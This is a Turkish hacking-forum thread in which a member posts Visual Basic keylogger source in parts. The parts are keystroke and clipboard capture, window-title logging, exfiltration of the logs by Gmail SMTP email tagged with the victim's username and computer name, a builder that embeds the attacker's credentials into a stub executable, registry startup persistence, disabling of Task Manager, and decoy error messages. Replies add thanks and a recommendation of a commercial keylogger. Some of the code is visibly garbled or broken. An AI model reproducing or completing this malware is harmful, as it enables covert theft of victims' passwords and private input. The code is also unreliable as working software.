İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Keylogger kodları [Buyuk Kaynak]

09-01-2013 22:01
#1
Cyper65 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2012
Nereden:
İzmir
Mesajlar:
1.585
Teşekkür (Etti):
201
Teşekkür (Aldı):
168
Konular:
228
Kodların hepsi alıntıdır bunu söyleyeyim
Şimdi kodlarmıza geçelim
----------------------------------------------
TUŞ KODLARI
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
Private Declare Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" (ByVal lpBuffer As String, nSize As Long) As Long

Private LastWindow As String
Private LastHandle As Long
Private dKey(255) As Long
Private Const VK_SHIFT = &H10
Private Const VK_CTRL = &H11
Private Const VK_ALT = &H12
Private Const VK_CAPITAL = &H14
Private ChangeChr(255) As String
Private AltDown As Boolean

Private Sub Timer1_Timer()
If GetAsyncKeyState(VK_ALT) = 0 And AltDown = True Then
AltDown = False
Text1 = Text1 & ""
End If


For I = Asc("A") To Asc("Z")
If GetAsyncKeyState(I) = -32767 Then
TypeWindow

If GetAsyncKeyState(VK_SHIFT) < 0 Then
If GetKeyState(VK_CAPITAL) > 0 Then
Text1 = Text1 & x0r(³¼žŒš×¼—×–ÖÖ)
Exit Sub
Else
Text1 = Text1 & UCase(Chr(I))
Exit Sub
End If
Else
If GetKeyState(VK_CAPITAL) > 0 Then
Text1 = Text1 & UCase(Chr(I))
Exit Sub
Else
Text1 = Text1 & LCase(Chr(I))
Exit Sub
End If
End If

End If
Next


For I = 48 To 57
If GetAsyncKeyState(I) = -32767 Then
TypeWindow

If GetAsyncKeyState(VK_SHIFT) < 0 Then
Text1 = Text1 & ChangeChr(I)
Exit Sub
Else
Text1 = Text1 & Chr(I)
Exit Sub
End If

End If
NextFor I = 186 To 192
If GetAsyncKeyState(I) = -32767 Then
TypeWindow

If GetAsyncKeyState(VK_SHIFT) < 0 Then
Text1 = Text1 & ChangeChr(I - 100)
Exit Sub
Else
Text1 = Text1 & ChangeChr(I)
Exit Sub
End If

End If
NextFor I = 219 To 222
If GetAsyncKeyState(I) = -32767 Then
TypeWindow

If GetAsyncKeyState(VK_SHIFT) < 0 Then
Text1 = Text1 & ChangeChr(I - 100)
Exit Sub
Else
Text1 = Text1 & ChangeChr(I)
Exit Sub
End If

End If
Next


For I = 96 To 111
If GetAsyncKeyState(I) = -32767 Then
TypeWindow

If GetAsyncKeyState(VK_ALT) < 0 And AltDown = False Then
AltDown = True
Text1 = Text1 & ""
Else
If GetAsyncKeyState(VK_ALT) >= 0 And AltDown = True Then
AltDown = False
Text1 = Text1 & ""
End If
End If

Text1 = Text1 & ChangeChr(I)
Exit Sub
End If
Next


If GetAsyncKeyState(32) = -32767 Then
TypeWindow
Text1 = Text1 & " "
End If


If GetAsyncKeyState(13) = -32767 Then
TypeWindow
Text1 = Text1 & vbCrLf
End If


If GetAsyncKeyState(8) = -32767 Then
TypeWindow
Text1 = Text1 & " "
End If


If GetAsyncKeyState(37) = -32767 Then
TypeWindow
Text1 = Text1 & ""
End If


If GetAsyncKeyState(38) = -32767 Then
TypeWindow
Text1 = Text1 & ""
End If


If GetAsyncKeyState(39) = -32767 Then
TypeWindow
Text1 = Text1 & ""
End If


If GetAsyncKeyState(40) = -32767 Then
TypeWindow
Text1 = Text1 & ""
End If


If GetAsyncKeyState(9) = -32767 Then
TypeWindow
Text1 = Text1 & " [Tab] "
End If


If GetAsyncKeyState(27) = -32767 Then
TypeWindow
Text1 = Text1 & " [Esc] "
End If


For I = 45 To 46
If GetAsyncKeyState(I) = -32767 Then
TypeWindow
Text1 = Text1 & ChangeChr(I)
End If
Next


For I = 33 To 36
If GetAsyncKeyState(I) = -32767 Then
TypeWindow
Text1 = Text1 & ChangeChr(I)
End If
Next


If GetAsyncKeyState(1) = -32767 Then
If (LastHandle = GetForegroundWindow) And LastHandle <> 0 Then
Text1 = Text1 & " "
End If
End If

End Sub

---------------------------------------------------------------------------------------------------------------------
Mail Yollama Kodları
Private Sub Timer2_Timer()

Dim iMsg, iConf, Flds
Set iMsg = CreateObject("CDO.Message")
Set iConf = CreateObject("CDO.Configuration")
Set Flds = iConf.Fields
schema = x0r("—‹‹ÅĞĞŒœ—š’žŒÑ’–œŒ™‹Ñœ’Ğœ›Ğœ‘™–˜Šž‹– ‘Ğ")
Flds.Item(schema & "sendusing") = 2
Flds.Item(schema & "smtpserver") = "smtp.gmail.com"
Flds.Item(schema & "smtpserverport") = 465
Flds.Item(schema & "smtpauthenticate") = 1
Flds.Item(schema & "sendusername") = mail
Flds.Item(schema & "sendpassword") = sifre
Flds.Item(schema & "smtpusessl") = 1
Flds.Update
With iMsg
.To = alici
.From = "Coded By Heaven"
.Subject = VBA.Environ("USERNAME") & VBA.Environ("COMPUTERNAME")
.HTMLbOdy = (Text1.Text)
.Organization = "Mail Organtion"
.ReplyTo = "-"
Set .Configuration = iConf
SendEmailGmail = .Send

End With
End If
End Sub
----------------------------------------------------------------------------------------------------------------
Server oluşturma kodları
Private Sub Command1_Click()
If Text1.Text = "" Then GoTo err:

If Text2.Text = "" Then GoTo err:

If Text3.Text = "" Then GoTo err:

If Text4.Text = "" Then GoTo err:


On Error GoTo err

With cd
.Filter = "Executable | *.exe"
.FileName = ""
.ShowSave
build .FileName


End With
MsgBox "Serveriniz Basarıyla Oluşturuldu", vbInformation, "00xx Keylogger"
Exit Sub

err:
MsgBox "Stubu Enjekte Edin ! Yoksa Server Oluşmaz !", vbCritical, "Oluşturmada Hata"
End Sub

Public Function x0r(ByVal X1 As String) As String
Dim KOD As String, X2 As String * 1, X3 As Double
For X3 = 1 To Len(X1)
X2 = Mid(X1, X3, 1)
KOD = KOD & Chr(Asc(X2) Xor 255)
Next X3
x0r = KOD
End Function
------------------------------------------------------------------------------------------------
TEST MAİL KODLARI
Private Sub Command2_Click()
On Error Resume Next
Dim iMsg, iConf, Flds
Set iMsg = CreateObject("CDO.Message")
Set iConf = CreateObject("CDO.Configuration")
Set Flds = iConf.Fields
schema = x0r("—‹‹ÅĞĞŒœ—š’žŒÑ’–œŒ™‹Ñœ’Ğœ›Ğœ‘™–˜Šž‹– ‘Ğ")
Flds.Item(schema & "sendusing") = 2
Flds.Item(schema & "smtpserver") = "smtp.gmail.com"
Flds.Item(schema & "smtpserverport") = 465
Flds.Item(schema & "smtpauthenticate") = 1
Flds.Item(schema & "sendusername") = Text1.Text
Flds.Item(schema & "sendpassword") = Text2.Text
Flds.Item(schema & "smtpusessl") = 1
Flds.Update
With iMsg
.To = Text3.Text
.From = "HeaveN Test Mail"
.Subject = VBA.Environ("USERNAME") & VBA.Environ("COMPUTERNAME")
.HTMLbOdy = ("Test Maili Onaylandı.")
.Organization = "Mail Organtion"
.ReplyTo = "-"
Set .Configuration = iConf
SendEmailGmail = .Send
End With
MsgBox "Mail başarıyla gönderildi.", vbInformation, "TEST MAİL"
End Sub


-----------------------------------------------------------------------------------------------------------------
Kullanıcı İmzası
Ey Türk, Titre ve Kendine Dön! Üstte mavi gök çökmedikçe, Altta yağız yer delinmedikçe, Kim bozabilir senin ilini ve töreni!
cacanist Teşekkür etti.

09-01-2013 22:06
#2
Cyper65 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2012
Nereden:
İzmir
Mesajlar:
1.585
Teşekkür (Etti):
201
Teşekkür (Aldı):
168
Konular:
228
BAŞLANGICA EKLEME KODLARI
Dim ekle As Object
Set KayitDefteri = CreateObject("wscript.shell")
ekle.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CUR RENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"
-------------------------------------------------------------------------------------------------------------------------
FORM LOAD KODLARI

Private Sub Form_Load()Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
Get #1, LOF(1) - 99, options
Close #1
cmd() = Split(options, "#")
mail = cmd(0)
sifre = cmd(1)
alici = cmd(2)
dakika = cmd(3)
engelle = cmd(4)
hAta = cmd(5)
hata1 = cmd(6)
hata2 = cmd(7)
kopyala = cmd(8)


' Görev Yöneticis Engelle
If engelle = 1 Then
Dim reg
Set reg = CreateObject("Wscript.Shell")
reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
End If

' hata msj ver
If hAta = 1 Then
MsgBox hata1, vbCritical, hata2
End If
'kopyalanan yazıları al
If kopyala = 1 Then
Timer4.Enabled = True
End If

-------------------------------------------------------------------------------------------------------------------------
Fuction buılder kodları
Private Function build(rtyu As String)
Dim atta() As Byte
Dim options As String * 100

atta() = LoadResData(101, "CUSTOM")
Open rtyu For Binary As #1
Put #1, , atta()
Close #1
Dim mail As String
Dim sifre As String
Dim alici As String
Dim dakika As String
Dim hata as string
dim hata1 as string
dim hata2 as string


mail = Text1.Text
sifre = Text2.Text
alici = Text3.Text
dakika = Text4.Text
engelle = Check1.Value
hata = Check2.Value
hata1 = Text6.Text
hata2 = Text5.Text


options = mail & "#" & sifre & "#" & alici & "#" & dakika & "#" & engelle & "#" & hata & "#" & hata1 & "#" & hata2 & "#"
Open rtyu For Binary As #1
Put #1, LOF(1) + 1, options
Close #1


End Function
---------------------------------------------------------------------------------------------------------
x0r ve başlık alma kodları
Function TypeWindow() 'başlıgı al
Dim Handle As Long
Dim textlen As Long
Dim WindowText As String

Handle = GetForegroundWindow
LastHandle = Handle
textlen = GetWindowTextLength(Handle) + 1

WindowText = Space(textlen)
svar = GetWindowText(Handle, WindowText, textlen)
WindowText = Left(WindowText, Len(WindowText) - 1)

If WindowText <> LastWindow Then
If Form1.Text1 <> "" Then Form1.Text1 = Form1.Text1 & vbCrLf & vbCrLf
Text1 = Text1 & "<br>" & vbNewLine & "<br>" & vbCrLf & WindowText & vbCrLf & "<br>" & vbNewLine & "<br>" & vbCrLf
LastWindow = WindowText
End If
End Function


Public Function x0r(ByVal X1 As String) As String
Dim KOD As String, X2 As String * 1, X3 As Double
For X3 = 1 To Len(X1)
X2 = Mid(X1, X3, 1)
KOD = KOD & Chr(Asc(X2) Xor 255)
Next X3
x0r = KOD
End Function
---------------------------------------------------------------------------------------------------------------------------------------
Kullanıcı İmzası
Ey Türk, Titre ve Kendine Dön! Üstte mavi gök çökmedikçe, Altta yağız yer delinmedikçe, Kim bozabilir senin ilini ve töreni!
cacanist Teşekkür etti.
10-01-2013 12:58
#3
Cyper65 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2012
Nereden:
İzmir
Mesajlar:
1.585
Teşekkür (Etti):
201
Teşekkür (Aldı):
168
Konular:
228
SORUNSUZ LOG ALIMI
Option Explicit
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Long
Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function GetWindowTextLength Lib "user32.dll" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer
Private Pencerem As String
Private exLogum As String
Private Const Basıldı = -32767


Public Function LogAl(neresine As String)
On Error Resume Next
Dim Degiskenim As Integer
Dim TamKlavyem As String
Dim CapsLockLogları As Boolean
Dim AltTuşuLogları As Boolean
Dim CtrlTuşuLogları As Boolean
Dim ShiftTuşuLogları As Boolean

For Degiskenim = 1 To 255
If GetAsyncKeyState(Degiskenim) = Basıldı Then
TamKlavyem = Degiskenim
If GetAsyncKeyState(17) = -32768 And GetAsyncKeyState(86) = -32768 Then CtrlTuşuLogları = True
If GetKeyState(vbKeyCapital) = -127 Or GetKeyState(vbKeyCapital) = 1 Then CapsLockLogları = True Else CapsLockLogları = False
If GetAsyncKeyState(16) = -32768 Then ShiftTuşuLogları = True Else ShiftTuşuLogları = False
If GetAsyncKeyState(18) = -32768 Then AltTuşuLogları = True Else AltTuşuLogları = False
If Degiskenim >= 65 And Degiskenim <= 90 Then
If CapsLockLogları = True And ShiftTuşuLogları = False Then TamKlavyem = Chr(Degiskenim)
If CapsLockLogları = False And ShiftTuşuLogları = False Then TamKlavyem = Chr(Degiskenim + 32)
If CapsLockLogları = False And ShiftTuşuLogları = True Then TamKlavyem = Chr(Degiskenim)
If CapsLockLogları = True And ShiftTuşuLogları = True Then TamKlavyem = Chr(Degiskenim + 32)
If Degiskenim = 86 And CtrlTuşuLogları = True Then: TamKlavyem = "<>Clipboard" & Clipboard.GetText & ")<>"
End If

If Degiskenim = 1 Then TamKlavyem = vbNullString ': Call SanalKlavyeyiDevreyeSok
If Degiskenim = 2 Then TamKlavyem = vbNullString ': Call SanalKlavyeyiDevreyeSok
If Degiskenim = 3 Then TamKlavyem = vbNullString ': Call SanalKlavyeyiDevreyeSok
If Degiskenim = 4 Then TamKlavyem = vbNullString
If Degiskenim = 8 Then TamKlavyem = "{BACK}"
If Degiskenim = 9 Then TamKlavyem = "{TAB}"
If Degiskenim = 12 Then TamKlavyem = vbNullString
If Degiskenim = 13 Then TamKlavyem = "{ENTER}" & vbCrLf ': Call SanalKlavyeyiDevreyeSok
If Degiskenim = 19 Then TamKlavyem = "{PAUSE BREAK}"
If Degiskenim = 20 Then TamKlavyem = vbNullString
If Degiskenim = 32 Then TamKlavyem = Chr(32)
'--------------------------------------
If Degiskenim = 33 Then TamKlavyem = "{PAGE UP}"
If Degiskenim = 34 Then TamKlavyem = "{PAGE DOWN}"
If Degiskenim = 35 Then TamKlavyem = "{END}"
If Degiskenim = 36 Then TamKlavyem = "{HOME}"
If Degiskenim = 37 Then TamKlavyem = "{LEFT}"
If Degiskenim = 38 Then TamKlavyem = "{UP}"
If Degiskenim = 39 Then TamKlavyem = "{RIGHT}"
If Degiskenim = 40 Then TamKlavyem = "{DOWN}"
If Degiskenim = 44 Then TamKlavyem = "{PRINT SCREEN}"
If Degiskenim = 45 Then TamKlavyem = "{INSERT}"
If Degiskenim = 46 Then TamKlavyem = "{DELETE}"
'--------------------------------------
If Degiskenim = 91 Then TamKlavyem = vbNullString
If Degiskenim = 92 Then TamKlavyem = vbNullString
If Degiskenim = 93 Then TamKlavyem = vbNullString
If Degiskenim = 96 Then TamKlavyem = "0"
If Degiskenim = 97 Then TamKlavyem = "1"
If Degiskenim = 98 Then TamKlavyem = "2"
If Degiskenim = 99 Then TamKlavyem = "3"
If Degiskenim = 100 Then TamKlavyem = "4"
If Degiskenim = 101 Then TamKlavyem = "5"
If Degiskenim = 102 Then TamKlavyem = "6"
If Degiskenim = 103 Then TamKlavyem = "7"
If Degiskenim = 104 Then TamKlavyem = "8"
If Degiskenim = 105 Then TamKlavyem = "9"
If Degiskenim = 106 Then TamKlavyem = "*"
If Degiskenim = 107 Then TamKlavyem = "+"
If Degiskenim = 109 Then TamKlavyem = "-"
If Degiskenim = 110 Then TamKlavyem = "."
If Degiskenim = 111 Then TamKlavyem = "/"
If Degiskenim = 112 Then TamKlavyem = vbNullString
If Degiskenim = 113 Then TamKlavyem = vbNullString
If Degiskenim = 114 Then TamKlavyem = vbNullString
If Degiskenim = 115 Then TamKlavyem = vbNullString
If Degiskenim = 116 Then TamKlavyem = vbNullString
If Degiskenim = 117 Then TamKlavyem = vbNullString
If Degiskenim = 118 Then TamKlavyem = vbNullString
If Degiskenim = 119 Then TamKlavyem = vbNullString
If Degiskenim = 120 Then TamKlavyem = vbNullString
If Degiskenim = 121 Then TamKlavyem = vbNullString
If Degiskenim = 122 Then TamKlavyem = vbNullString
If Degiskenim = 123 Then TamKlavyem = vbNullString
If Degiskenim = 144 Then TamKlavyem = vbNullString
If Degiskenim = 145 Then TamKlavyem = "{SCROLL LOCK}"
If Degiskenim = 160 Then TamKlavyem = vbNullString
If Degiskenim = 161 Then TamKlavyem = vbNullString
If Degiskenim = 162 Then TamKlavyem = vbNullString
If Degiskenim = 163 Then TamKlavyem = vbNullString
If Degiskenim = 164 Then TamKlavyem = vbNullString
If Degiskenim = 165 Then TamKlavyem = vbNullString
If Degiskenim = 226 Then '0
If AltTuşuLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "<"
If AltTuşuLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = ">"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "|"
End If
If Degiskenim = 65 Then '0
If CapsLockLogları = True And ShiftTuşuLogları = True Then: TamKlavyem = "a"
If CapsLockLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "A"
If CapsLockLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "A"
If CapsLockLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "a"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "æ"
End If
If Degiskenim = 69 Then
If CapsLockLogları = True And ShiftTuşuLogları = True Then: TamKlavyem = "e"
If CapsLockLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "E"
If CapsLockLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "E"
If CapsLockLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "e"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "€"
End If

If Degiskenim = 83 Then
If CapsLockLogları = True And ShiftTuşuLogları = True Then: TamKlavyem = "s"
If CapsLockLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "S"
If CapsLockLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "S"
If CapsLockLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "s"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "ß"
End If
If Degiskenim = 48 Then
If AltTuşuLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "0"
If AltTuşuLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "="
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "}"
End If
If Degiskenim = 49 Then
If AltTuşuLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "1"
If AltTuşuLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "!"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = ">"
End If
If Degiskenim = 50 Then
If AltTuşuLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "2"
If AltTuşuLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "'"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "£"
End If
If Degiskenim = 51 Then
If AltTuşuLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "3"
If AltTuşuLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "^"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "#"
End If
If Degiskenim = 52 Then
If AltTuşuLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "4"
If AltTuşuLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "+"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "$"
End If
If Degiskenim = 53 Then
If AltTuşuLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "5"
If AltTuşuLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "%"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "½"
End If
If Degiskenim = 54 Then
If AltTuşuLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "6"
If AltTuşuLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "&"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = ""
End If
If Degiskenim = 55 Then
If AltTuşuLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "7"
If AltTuşuLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "/"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "{"
End If
If Degiskenim = 56 Then
If AltTuşuLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "8"
If AltTuşuLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "("
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "["
End If
If Degiskenim = 57 Then
If AltTuşuLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "9"
If AltTuşuLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = ")"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "]"
End If
If Degiskenim = 81 Then
If CapsLockLogları = True And ShiftTuşuLogları = True Then: TamKlavyem = "q"
If CapsLockLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "Q"
If CapsLockLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "Q"
If CapsLockLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "q"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "@"
End If
If Degiskenim = 222 Then
If CapsLockLogları = True And ShiftTuşuLogları = True Then: TamKlavyem = "i"
If CapsLockLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "İ"
If CapsLockLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "İ"
If CapsLockLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "i"
End If
If Degiskenim = 223 Then
If AltTuşuLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "*"
If AltTuşuLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "?"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "\"
End If
If Degiskenim = 189 Then
If AltTuşuLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "-"
If AltTuşuLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "_"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "|"
End If
If Degiskenim = 190 Then
If AltTuşuLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "."
If AltTuşuLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = ":"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = ""
End If
If Degiskenim = 191 Then
If CapsLockLogları = True And ShiftTuşuLogları = True Then: TamKlavyem = "ö"
If CapsLockLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "Ö"
If CapsLockLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "Ö"
If CapsLockLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "ö"
End If
If Degiskenim = 192 Then
If AltTuşuLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = """"
If AltTuşuLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "é"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "<"
End If
If Degiskenim = 219 Then
If CapsLockLogları = True And ShiftTuşuLogları = True Then: TamKlavyem = "ğ"
If CapsLockLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "Ğ"
If CapsLockLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "Ğ"
If CapsLockLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "ğ"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "¨"
End If
If Degiskenim = 220 Then
If CapsLockLogları = True And ShiftTuşuLogları = True Then: TamKlavyem = "ç"
If CapsLockLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "Ç"
If CapsLockLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "Ç"
If CapsLockLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "ç"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = ""
End If

If Degiskenim = 221 Then
If CapsLockLogları = True And ShiftTuşuLogları = True Then: TamKlavyem = "ü"
If CapsLockLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "Ü"
If CapsLockLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "Ü"
If CapsLockLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "ü"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "~"
End If
If Degiskenim = 186 Then
If CapsLockLogları = True And ShiftTuşuLogları = True Then: TamKlavyem = "ş"
If CapsLockLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "Ş"
If CapsLockLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "Ş"
If CapsLockLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "ş"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "´"
End If
If Degiskenim = 188 Then
If AltTuşuLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = ","
If AltTuşuLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = ";"
If AltTuşuLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "`"
End If
If Degiskenim = 73 Then
If CapsLockLogları = True And ShiftTuşuLogları = True Then: TamKlavyem = "ı"
If CapsLockLogları = True And ShiftTuşuLogları = False Then: TamKlavyem = "I"
If CapsLockLogları = False And ShiftTuşuLogları = True Then: TamKlavyem = "I"
If CapsLockLogları = False And ShiftTuşuLogları = False Then: TamKlavyem = "ı"
If CapsLockLogları = True And AltTuşuLogları = True Then: TamKlavyem = "İ"
If CapsLockLogları = False And AltTuşuLogları = True Then: TamKlavyem = "i"
End If
If Degiskenim = 255 Then If ShiftTuşuLogları = False Then TamKlavyem = vbNullString Else TamKlavyem = vbNullString
End If

Next Degiskenim

If Not Pencerem = PencereBaşlığınıAl(GetForegroundWindow) Then
Pencerem = PencereBaşlığınıAl(GetForegroundWindow)
If Len(Pencerem) <> 0 Then
TamKlavyem = TamKlavyem & vbCrLf & "[ " & Pencerem & " - " & Time & " ]" & vbCrLf
Open neresine For Append As #1
Print #1, exLogum
exLogum = vbNullString
Close #1
End If
End If

exLogum = exLogum & TamKlavyem
TamKlavyem = vbNullString

End Function
Public Function PencereBaşlığınıAl(Kordinatı As Long) As String
On Error Resume Next
Dim hOrtası As Long, hBaslık As String, eDegisken As Long
hOrtası = GetWindowTextLength(Kordinatı)
hBaslık = String$(hOrtası, 0)
eDegisken = GetWindowText(Kordinatı, hBaslık, (hOrtası + 1))
PencereBaşlığınıAl = hBaslık
End Function
Private Sub Timer1_Timer()
Debug.Print LogAl("C:\ap0x.log")
End Sub
------------------------------------------------------------------
Tİmer
-------------
Private Sub Timer1_Timer()
LogAl
End Sub
-----------------
logal fonksiyonu
-----
Public Function LogAl()
----------------------
KOdu
------
' Open neresine For Append As #1
' Print #1, exLogum
' exLogum = vbNullString
' Close #1
logum.Text = exLogum
Kullanıcı İmzası
Ey Türk, Titre ve Kendine Dön! Üstte mavi gök çökmedikçe, Altta yağız yer delinmedikçe, Kim bozabilir senin ilini ve töreni!
cacanist Teşekkür etti.
10-01-2013 15:23
#4
Morcerf - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2013
Mesajlar:
111
Teşekkür (Etti):
26
Teşekkür (Aldı):
11
Konular:
9
Teşekkürler...
15-01-2013 17:57
#5
CeroEspada - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2012
Nereden:
City OF God
Mesajlar:
86
Teşekkür (Etti):
2
Teşekkür (Aldı):
29
Konular:
17
Mail yollayan loggeri boşuna koymussun hiç bir işe yaramıyor malesef

10-10-2013 10:59
#6
EmmaL - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2013
Mesajlar:
89
Teşekkür (Etti):
0
Teşekkür (Aldı):
2
Konular:
5
If you are using a Mac, I recommend Aobo keylogger. It works very well.
Kullanıcı İmzası
Love&Peace
14-10-2013 21:38
#7
mert0507 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2013
Mesajlar:
41
Teşekkür (Etti):
2
Teşekkür (Aldı):
4
Konular:
3
Çok saol Kardeş
14-10-2013 21:40
#8
Üyelik tarihi:
10/2013
Nereden:
D.KOPENHAQ
Yaş:
28
Mesajlar:
718
Teşekkür (Etti):
160
Teşekkür (Aldı):
83
Konular:
36
bıraz kafa karıstıryr
Kullanıcı İmzası
Tarihi;
Kazanan tarafın politikacıları yazar.[ANONİM]™
sybian_%80
hack_%50
internet site_%80
oyun_%40
GSM TEL._%80
Android_%76
15-10-2013 11:24
#9
Harmmy - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2012
Mesajlar:
533
Teşekkür (Etti):
48
Teşekkür (Aldı):
578
Konular:
129
[COLOR="rgb(65, 105, 225)"]benim h-s de paylaştıgım logger sourcesinde olan kodları parça parça koyuyorsun proje olarak koyda arkadaşlar da yararlansın [/COLOR]
Kullanıcı İmzası
Emeğe saygı gösterelim.
Teşekkür butonunu kullanalım lütfen.
hackbluesam Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı